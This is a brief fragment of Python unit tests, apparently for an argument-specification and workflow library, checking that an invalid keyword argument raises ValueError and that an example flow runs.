self.assertRaises(ValueError, ArgSpec, int, meow="bad arg")
class TestFlow(unittest.TestCase):
def test_run_example_1(self):
ctx = run_example_1()
assert ctx
|